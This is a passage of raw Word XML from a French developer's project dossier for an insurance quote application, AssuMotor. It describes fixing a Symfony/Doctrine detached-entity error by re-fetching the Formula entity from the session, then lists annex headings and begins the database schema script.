      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p w14:paraId="0F5450CA" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4" w:rsidP="008D4A28">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc233817802"/>
      <w:r>
        <w:t>9.1 Description du problème</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w14:paraId="30AC10BA" w14:textId="77777777" w:rsidR="00F868DD" w:rsidRDefault="003E12AF" w:rsidP="008D4A28">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Après avoir simulé un devis, l'utilisateur peut revenir sur le formulaire pour le modifier avant de soumettre sa demande de souscription. Pour préremplir le formulaire avec les données saisies précédemment, l'objet </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Quote</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (contenant l'entité Formula liée) est stocké en session PHP entre les deux étapes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540A8403" w14:textId="77777777" w:rsidR="00F868DD" w:rsidRDefault="00F868DD" w:rsidP="008D4A28">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32775C21" w14:textId="77777777" w:rsidR="00F868DD" w:rsidRDefault="003E12AF" w:rsidP="008D4A28">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le problème s'est manifesté lors du rendu du </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>QuoteFormType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> : Symfony levait une erreur indiquant que l'entité Formula associée au </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Quote</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ne correspondait pas aux entités retournées par la base de données. Le formulaire ne pouvait pas présélectionner la formule correcte et refusait de s'afficher.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28162D30" w14:textId="77777777" w:rsidR="00F868DD" w:rsidRDefault="00F868DD"/>
    <w:p w14:paraId="75D0640C" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4" w:rsidP="008D4A28">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_Toc233817803"/>
      <w:r>
        <w:t>9.2 Analyse et diagnostic</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:p w14:paraId="569B29DA" w14:textId="5B6C62CA" w:rsidR="00F868DD" w:rsidRPr="00555B5E" w:rsidRDefault="003E12AF" w:rsidP="008D4A28">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00555B5E">
        <w:t xml:space="preserve">L'analyse des logs Symfony a révélé le message suivant : « </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00555B5E">
        <w:t>Entity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00555B5E">
        <w:t xml:space="preserve"> of type Formula </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00555B5E">
        <w:t>passed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00555B5E">
        <w:t xml:space="preserve"> to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00555B5E">
        <w:t>choice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00555B5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00555B5E">
        <w:t>field</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00555B5E">
        <w:t xml:space="preserve"> must </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00555B5E">
        <w:t>be</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00555B5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00555B5E">
        <w:t>managed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00555B5E">
        <w:t>. »</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A17607" w14:textId="77777777" w:rsidR="00F868DD" w:rsidRPr="00555B5E" w:rsidRDefault="00F868DD" w:rsidP="008D4A28">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6239983F" w14:textId="77777777" w:rsidR="00F868DD" w:rsidRDefault="003E12AF" w:rsidP="008D4A28">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>La cause racine est un comportement connu de Doctrine ORM : lorsqu'une entité est sérialisée dans la session PHP puis désérialisée à la requête suivante, elle redevient un objet PHP ordinaire. L'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EntityManager</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de Doctrine ne la reconnaît plus comme une entité « managée » (suivie dans son Unit of Work). Elle possède des données valides et un identifiant, mais Doctrine ne peut plus l'utiliser directement dans les opérations ORM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5692A172" w14:textId="77777777" w:rsidR="00F868DD" w:rsidRDefault="00F868DD" w:rsidP="008D4A28">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52487638" w14:textId="77777777" w:rsidR="00F868DD" w:rsidRDefault="003E12AF" w:rsidP="008D4A28">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Concrètement, le composant Form de Symfony tente de comparer l'entité Formula désérialisée avec les entités Formula fraîchement chargées depuis la base pour construire la liste déroulante. Cette comparaison échoue car les deux instances ne partagent pas le même contexte Doctrine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EC1A16" w14:textId="77777777" w:rsidR="00F868DD" w:rsidRDefault="00F868DD"/>
    <w:p w14:paraId="3CB18C5E" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4" w:rsidP="008D4A28">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="_Toc233817804"/>
      <w:r>
        <w:t>9.3 Solution mise en œuvre</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p w14:paraId="0262CBD7" w14:textId="77777777" w:rsidR="00F868DD" w:rsidRDefault="003E12AF" w:rsidP="008D4A28">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La solution a été d'ajouter la méthode </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reatacheFormula</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">() dans le service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>QuoteManager</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Avant de passer le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Quote</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> désérialisé au formulaire, cette méthode re-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fetche</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> l'entité Formula depuis la base de données via son identifiant, ce qui la remet sous le contrôle de l'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EntityManager</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08675625" w14:textId="77777777" w:rsidR="00F868DD" w:rsidRDefault="00F868DD"/>
    <w:p w14:paraId="1C59E9BF"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i/>
          <w:iCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QuoteManager.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="40691755"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FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>public</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function</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reatacheFormula</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">?Quote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795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>): ?Quote</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB0F4A5"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11A60C7A"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if</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00FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp;&amp;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getFormula</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">() !== </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A395015"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setFormula</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C1EC19"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$this</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000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>em</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Formula</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>class</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getFormula</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>getId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718B7D4E"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
    <w:p w14:paraId="0F530DDA"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1080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$quote</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0047290F"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p>
    <w:p w14:paraId="44FED527"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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F44158D" w14:textId="77777777" w:rsidR="008D4A28" w:rsidRPr="00CE5980" w:rsidRDefault="008D4A28" w:rsidP="008D4A28">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A36371E" w14:textId="77777777" w:rsidR="008D4A28" w:rsidRPr="005D2D7E" w:rsidRDefault="008D4A28" w:rsidP="008D4A28">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F606CE1" w14:textId="77777777" w:rsidR="00F868DD" w:rsidRDefault="003E12AF" w:rsidP="008D4A28">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Le principe est simple : on conserve l'identifiant de la formule (qui survit à la sérialisation), on l'utilise pour recharger l'entité depuis la base via $this-&gt;em-&gt;find(), et on remplace l'instance détachée par cette nouvelle instance managée. L'EntityManager retrouve ainsi son contexte et le formulaire peut s'afficher correctement avec la formule présélectionnée.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313DF0B8" w14:textId="77777777" w:rsidR="00F868DD" w:rsidRDefault="00F868DD"/>
    <w:p w14:paraId="30489BC9" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4" w:rsidP="008D4A28">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="_Toc233817805"/>
      <w:r>
        <w:t>9.4 Vérification et résultat</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82"/>
    </w:p>
    <w:p w14:paraId="6C8D38CC" w14:textId="77777777" w:rsidR="00F868DD" w:rsidRDefault="003E12AF" w:rsidP="008D4A28">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Après l'application de la correction, le formulaire de devis se préremplie correctement avec toutes les données de la session : formule sélectionnée, durée, informations du conducteur et données du véhicule. Aucune erreur Doctrine n'est levée.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C8CE98" w14:textId="77777777" w:rsidR="00F868DD" w:rsidRDefault="00F868DD" w:rsidP="008D4A28">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32AA40A9" w14:textId="77777777" w:rsidR="00F868DD" w:rsidRDefault="003E12AF" w:rsidP="008D4A28">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>La vérification a été effectuée manuellement en suivant le parcours complet : simulation d'un devis, retour sur le formulaire pour modification, puis soumission de la demande de souscription. Le comportement est conforme à ce qui était attendu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487F6A03" w14:textId="77777777" w:rsidR="00F868DD" w:rsidRDefault="00F868DD"/>
    <w:p w14:paraId="5B12D988" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:spacing w:before="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="_Toc233817806"/>
      <w:r>
        <w:t>ANNEXES</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p w14:paraId="7D300FDE" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:spacing w:before="80" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>💡 Les annexes comportent 30 pages au maximum. Elles complètent le dossier sans le répéter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DDB335" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="_Toc233817807"/>
      <w:r>
        <w:t>Annexe A – Maquettes complètes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
    </w:p>
    <w:p w14:paraId="4F30BFF6" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>Insérez ici l'intégralité des maquettes (web et mobile) non incluses dans le corps du dossier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4113B1" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C"/>
    <w:p w14:paraId="079D202E" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C"/>
    <w:p w14:paraId="31E84500" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="_Toc233817808"/>
      <w:r>
        <w:t>Annexe B – Captures d'écran des interfaces</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p w14:paraId="36ABE4FF" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>Captures d'écran web et mobile des interfaces réalisées, avec les codes correspondants si non déjà inclus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7CD5DD" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C"/>
    <w:p w14:paraId="7F256735" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C"/>
    <w:p w14:paraId="58F55A0F" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="_Toc233817809"/>
      <w:r>
        <w:t>Annexe C – Code des composants significatifs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:p w14:paraId="578CCA63" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>Code source des composants front-end et back-end les plus représentatifs (non tronqué).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3D291B" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C"/>
    <w:p w14:paraId="785ED549" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C"/>
    <w:p w14:paraId="6929419C" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="_Toc233817810"/>
      <w:r>
        <w:t>Annexe D – Script complet de la base de données</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p w14:paraId="6EC6F3AE" w14:textId="77777777" w:rsidR="00F868DD" w:rsidRDefault="003E12AF">
      <w:r>
        <w:t>Script SQL complet de création de la base de données AssuMotor. Les 9 tables sont présentées individuellement avec leurs colonnes, leurs index et leurs contraintes de clé étrangère.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617F5DA2" w14:textId="77777777" w:rsidR="00F868DD" w:rsidRDefault="00F868DD"/>
    <w:p w14:paraId="6E3800C4" w14:textId="77777777" w:rsidR="00F868DD" w:rsidRPr="005D2D7E" w:rsidRDefault="003E12AF">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-- ── TABLE user ───────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
